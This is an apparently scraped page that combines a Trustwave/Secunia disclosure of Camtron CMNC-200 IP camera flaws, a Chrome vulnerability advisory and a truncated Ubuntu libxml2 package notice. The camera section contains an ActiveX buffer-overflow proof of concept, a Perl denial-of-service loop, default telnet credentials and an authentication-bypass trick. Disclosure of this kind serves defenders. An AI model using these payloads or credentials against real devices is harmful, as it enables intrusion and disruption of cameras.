Directory traversal vulnerability in the web-based administration interface on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. The Camtron CMNC-200 is a webcam. The Camtron CMNC-200 built-in WEB server has a directory traversal problem, and an attacker can read system files with ROOT privileges. Camtron CMNC-200 Full HD IP Camera is prone to multiple security vulnerabilities. Exploiting these issues will allow remote attackers to execute arbitrary code, trigger a denial of service, or completely compromise the device. TVSLiveControl 1.6.50.33 is vulnerable; others may also be affected. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Camtron CMNC-200 Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42229 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42229/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42229 RELEASE DATE: 2010-11-18 DISCUSS ADVISORY: http://secunia.com/advisories/42229/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42229/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42229 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Wendel G. Henrique has reported a security issue and some vulnerabilities in Camtron CMNC-200, which can be exploited by malicious people to bypass certain security restrictions, disclose potentially sensitive information, cause a DoS (Denial of Service), and compromise a vulnerable system. For more information: SA42311 The vulnerabilities are reported in version V1.102A-008 / Board ID 66. PROVIDED AND/OR DISCOVERED BY: Wendel G. Henrique, Trustwave's SpiderLabs ORIGINAL ADVISORY: https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The most notable features are full HD support (1920 x 1080), dual streaming, 10x optical zoom, SD card input, input and output alarm sensor, and integration with different DVR solutions. Source: http://www.camtron.co.kr Credit: Wendel G. Henrique of Trustwave's SpiderLabs CVE: CVE-2010-4230 CVE-2010-4231 CVE-2010-4232 CVE-2010-4233 CVE-2010-4244 Finding 1: Buffer Overflow in ActiveX Control CVE: CVE-2010-4230 The CMNC-200 IP Camera ActiveX control identified by CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable to a stack overflow on the first argument of the connect method. The vulnerability can be used to set the EIP register, allowing a reliable exploitation. The example code below triggers the vulnerability. <html> <head><title>IPcam POC</title> <script> function Check(){ var bf1 = 'A'; while (bf1.length <= 6144) bf1 = bf1 + 'A'; obj.connect(bf1,"BBBB","CCCC"); } </script> </head> <body onload=" Check();"> <object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32" id="obj"> </object> </html></body> Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. Authentication is not required for exploitation. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 3: Web Based Administration Interface Bypass CVE: CVE-2010-4232 The CMNC-200 IP Camera has an administrative web interface that does not handle authentication properly. Using a properly formatted request, an attacker can bypass the authentication mechanism. The first example requires authentication: http://www.ipcamera.com/system.html When a second forward slash is placed after the hostname, authentication is not required. Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 4: Undocumented Default Accounts CVE: CVE-2010-4233 The CMNC-200 IP Camera has undocumented default accounts on its Linux operating system. These accounts can be used to login via the cameras telnet interface, which cannot be normally disabled. The usernames and passwords are listed below. User: root Password: m User: mg3500 Password: merlin Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Finding 5: Camera Denial of Service CVE: CVE-2010-4234 The CMNC-200 IP Camera has a built-in web server that is vulnerable to denial of service attacks. Sending multiple requests in parallel to the web server may cause the camera to reboot. Requests with long cookie header makes the IP camera reboot a few seconds faster, however the same can be accomplished with requests of any size. The example code below is able to reboot the IP cameras in less than a minute in a local network. #!/usr/bin/perl use LWP::UserAgent; while (1 == 1){ $ua = new LWP::UserAgent; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6)"); $req = HTTP::Request->new(GET => 'http://192.168.10.100'); $req->header(Accept => "text/xml,application/xml,application/xhtml+xml,text/html ;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"); $req->header("Keep-Alive" => 0); $req->header(Connection => "close"); $req->header("If-Modified-Since" => "Mon, 12 Oct 2009 02:06:34 GMT"); $req->header(Cookie => "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); my $res = $ua->request($req); } Vendor Response: No response received. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 10/7/10 - Vendor contact attempted 10/21/10 - Vendor contact attempted 11/1/10 - Vendor contact attempted 11/11/10 - CVE numbers obtained 11/12/10 - Advisory public release Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

libxml2 before 2.7.8, as used in Google Chrome before 7.0.517.44, Apple Safari 5.0.2 and earlier, and other products, reads from invalid memory locations during processing of malformed XPath expressions, which allows context-dependent attackers to cause a denial of service (application crash) via a crafted XML document. Google Chrome is an open source web browser released by Google. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42472 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42472/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42472 RELEASE DATE: 2010-12-04 DISCUSS ADVISORY: http://secunia.com/advisories/42472/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42472/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42472 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities and weaknesses have been reported in Google Chrome, where some have an unknown impact and other can potentially be exploited by malicious people to compromise a vulnerable system. 1) An unspecified error exists, which can lead to cross-origin video theft with canvas. 2) An unspecified error can be exploited to cause a crash with HTML5 databases. 3) An unspecified error can be exploited to cause excessive file dialogs, potentially leading to a crash. 4) A use-after-free error in the history handling can be exploited to corrupt memory. 5) An unspecified error related to HTTP proxy authentication can be exploited to cause a crash. 6) An unspecified error in WebM video support can be exploited to trigger an out-of-bounds read. 7) An error related to incorrect indexing with malformed video data can be exploited to cause a crash. 8) An unspecified error in the handling of privileged extensions can be exploited to corrupt memory. 9) An use-after-free error in the handling of SVG animations can be exploited to corrupt memory. 10) A use-after-free error in the mouse dragging event handling can be exploited to corrupt memory. 11) A double-free error in the XPath handling can be exploited to corrupt memory. SOLUTION: Fixed in version 8.0.552.215. PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR) 2) Google Chrome Security Team (Inferno) 3) Cezary Tomczak (gosu.pl) 4) Stefan Troger 5) Mohammed Bouhlel 6) Google Chrome Security Team (Chris Evans) 7) miaubiz 8, 10) kuzzcc 9) S&#322;awomir B&#322;a&#380;ek 11) Yang Dingning from NCNIPC, Graduate University of Chinese Academy of Sciences ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . =========================================================== Ubuntu Security Notice USN-1016-1 November 10, 2010 libxml2 vulnerability CVE-2010-4008 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libxml2 2.6.24.dfsg-1ubuntu1.6 Ubuntu 8.04 LTS: libxml2 2.6.31.dfsg-2ubuntu1.5 Ubuntu 9.10: libxml2 2.7.5.dfsg-1ubuntu1.2 Ubuntu 10.04 LTS: libxml2 2.7.6.dfsg-1ubuntu1.1 Ubuntu 10.10: libxml2 2.7.7.dfsg-4ubuntu0.1 After a standard system update you need to restart your session to make all the necessary changes. Details follow: Bui Quang Minh discovered that libxml2 did not properly process XPath namespaces and attributes. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.6.diff.gz Size/MD5: 63134 53c8d42d671011985cd9d8ea5608fcde http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.6.dsc Size/MD5: 1543 a1e7586fca56d8893b202f3b69a9874b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg.orig.tar.gz Size/MD5: 3293814 461eb1bf7f0c845f7ff7d9b1a4c4eac8 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.24.dfsg-1ubuntu1.6_all.deb Size/MD5: 1253388 179adb134ac8a7e1764af4bb4b665dca http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.24.dfsg-1ubuntu1.6_all.deb Size/MD5: 19552 c7a28c7f3cac1b4353736c53c3f5476e amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.6_amd64.deb Size/MD5: 916230 c9d559f9efc45459b7eb043c391977f6 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.6_amd64.deb Size/MD5: 737032 ee6a12097f34fd11d45cc4a5e7f1203b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.6_amd64.deb Size/MD5: 36682 4f1a34fe46aba5c064665013533de1f0 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.6_amd64.deb Size/MD5: 753256 299c9a814aa4130ed68c747f3a563cc7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.6_amd64.deb Size/MD5: 184058 46dec69a1fb70a3ecca3561fd0a29911 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.6_i386.deb Size/MD5: 766048 0e6d13b2ef51ab33afdfe237accc18a1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.6_i386.deb Size/MD5: 642032 3eed65e83955272fce82bffb76dd5dcd http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.6_i386.deb Size/MD5: 32964 9cb389f28a51e1c2aefe275b03e8050d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.6_i386.deb Size/MD5: 685400 db4f6c390f9d3f69a9e9e2cee344266a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.6_i386.deb Size/MD5: 166406 7ce05a2f0a2a90120f5d439f6501d97f powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.6_powerpc.deb Size/MD5: 905204 9a77daba94a9be111628a338c5ffb154 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.6_powerpc.deb Size/MD5: 761222 e4800dc38f61dced6126e885ac09454c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.6_powerpc.deb Size/MD5: 37436 e71f758acefe2915ed1fea5cc2a30ac7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.6_powerpc.deb Size/MD5: 734368 6de873b8e7a8cb058bcc44a4975eeada http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.6_powerpc.deb Size/MD5: 170816 b2129478b4ddc2b383b43ba8ab276cbb sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.6_sparc.deb Size/MD5: 745794 65b0e3448860c893924c1576a263140d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.6_sparc.deb Size/MD5: 703540 2fff002190f407fc8722b387b8248790 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.6_sparc.deb Size/MD5: 34316 694551e56718a4e9b9dbec0be5e00704 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.6_sparc.deb Size/MD5: 717042 6e608e7a8d60dda1a3c547f84b2fe0e2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.6_sparc.deb Size/MD5: 174782 9efd16bc6f12a4cbecbb33eedf0f59bb Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.5.diff.gz Size/MD5: 67529 1b207152b6226f5940685b8b2fea1f24 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.5.dsc Size/MD5: 1713 f7e1e6005b976b150e3661bb26a94ecc http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg.orig.tar.gz Size/MD5: 3442959 8498d4e6f284d2f0a01560f089cb5a3e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.31.dfsg-2ubuntu1.5_all.deb Size/MD5: 1302598 efe04e483b0d7f4e7667b3a4ecc94586 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_amd64.deb Size/MD5: 939326 0eb784ef2f0ecf982497b4201613af2e http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.5_amd64.deb Size/MD5: 754052 49b2c14eefae312826d03c7b7be1c4c7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.5_amd64.udeb Size/MD5: 580512 1e7766fb0e468b40651ce755dbdfea54 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.5_amd64.deb Size/MD5: 37046 4a40bba60cac475aeb1d0a3cfea6eb0a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.5_amd64.deb Size/MD5: 833220 1c60c32bec1bc2ae88d06ae3c0f32a95 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_amd64.deb Size/MD5: 872894 9b0be2a97aca74569cec755fe3d0a35d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.5_amd64.deb Size/MD5: 297968 93374d18fc52deb80af072a2c42e046b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_i386.deb Size/MD5: 904954 490548308483e84c7c09ac5c15de00c7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.5_i386.deb Size/MD5: 676546 d297e5fd2ef1f31269493a041ea1704a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.5_i386.udeb Size/MD5: 533336 f4f60677db9cceec342896a2879bde36 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.5_i386.deb Size/MD5: 34048 6bee617039e92ab6e3c4dd0ab264cb6b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.5_i386.deb Size/MD5: 786298 d0b012bfd7f93f4ca584e86a211dc4fa http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_i386.deb Size/MD5: 796240 3ceba723ea50566efa344bcd5c5eb182 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.5_i386.deb Size/MD5: 262970 ca1f5f0cd0e148e898932807e87d2f52 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_lpia.deb Size/MD5: 930900 b6dc34ab449a620190690388ec88ebe9 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.5_lpia.deb Size/MD5: 679624 ac0fad1977d0787fc303cc01654a524c http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.5_lpia.udeb Size/MD5: 529252 19e39c71310a2af86851806e5654fd77 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.5_lpia.deb Size/MD5: 34502 f86e1e7a8b80b081feaa844e5d330ee1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.5_lpia.deb Size/MD5: 781692 9144099311803e4bbc553e00aefb6356 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_lpia.deb Size/MD5: 788522 8abc293e1cf971d68002f28a7f0b628d http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.5_lpia.deb Size/MD5: 259640 c3f498ebd7e12d7ad25aabaa4f684051 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_powerpc.deb Size/MD5: 923260 f44687101d3bbe816ca5bce88f9f85ac http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.5_powerpc.deb Size/MD5: 776324 33b0a1aaf57bb567346f80176cf7156d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.5_powerpc.udeb Size/MD5: 564064 92f0b140ed8c2a0ea1ac6473ef0d1a03 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.5_powerpc.deb Size/MD5: 42066 afb5063ea0543d0f512b95735908f5a8 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.5_powerpc.deb Size/MD5: 816958 6e8f7442a159472b1086449fd10de422 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_powerpc.deb Size/MD5: 841302 69d3545dd6d37bca91705d1612d6183b http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.5_powerpc.deb Size/MD5: 285366 7588b17997df1e729ceb5b86a8b52a91 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_sparc.deb Size/MD5: 826472 07939676f60cf0ead2cb2f3591413fd4 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.5_sparc.deb Size/MD5: 719780 870ca497bb44e66cb5bd8ef8ef046e70 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.5_sparc.udeb Size/MD5: 541104 3125fa7538b2daa2b13ff7efd86685a7 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.5_sparc.deb Size/MD5: 36188 73a56340014168d1f3375a416caf244a http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.5_sparc.deb Size/MD5: 793652 a238e613e270df78278c3160bfd7bb0e http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.5_sparc.deb Size/MD5: 807904 5f51dfbfa67369bfe0859bddc5fc5438 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.5_sparc.deb Size/MD5: 277528 c103ddc0e75de2769a88a2f25746c3d0 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.5.dfsg-1ubuntu1.2.diff.gz Size/MD5: 108519 d17730e785decf28f5a416834ed9ea0d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.5.dfsg-1ubuntu1.2.dsc Size/MD5: 2285 1140833c76ef5ba2fe0a9a64c4d707df http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.5.dfsg.orig.tar.gz Size/MD5: 3484976 fee69f57cb5a0653de8c5ef4a281de4d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.7.5.dfsg-1ubuntu1.2_all.deb Size/MD5: 1370078 bbbc21ce6cdc64e0ff475d7c3dc7161b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 1016094 d9d5851fa2d930b3923b3a54d5c8b812 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.7.5.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 827046 c870d00d09bc9b0f0136bb354a07d08f http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.7.5.dfsg-1ubuntu1.2_amd64.udeb Size/MD5: 602736 bc7e90b01c56cd8800a54872b8de7f26 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.7.5.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 89876 4588f1042574779b2ec91889c07c2cb3 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.7.5.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 868622 2551a75c15d409ca15b697315efd2e4b http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 850160 139bc53131b27b1325861a8438263054 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.7.5.dfsg-1ubuntu1.2_amd64.deb Size/MD5: 410194 4d0995f2adfb808f9c6926e1a40e14d5 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.7.5.dfsg-1ubuntu1.2_i386.deb Size/MD5: 1007478 45ee3f9bbd9c876a1363aff43de44e18 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.7.5.dfsg-1ubuntu1.2_i386.deb Size/MD5: 748544 a6114bf08366737b775420e09e1bc34c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.7.5.dfsg-1ubuntu1.2_i386.udeb Size/MD5: 558030 d62d06b344fd266d871c907c5af54cd7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.7.5.dfsg-1ubuntu1.2_i386.deb Size/MD5: 86070 96be1603f40d35fff3396df16a30bcc3 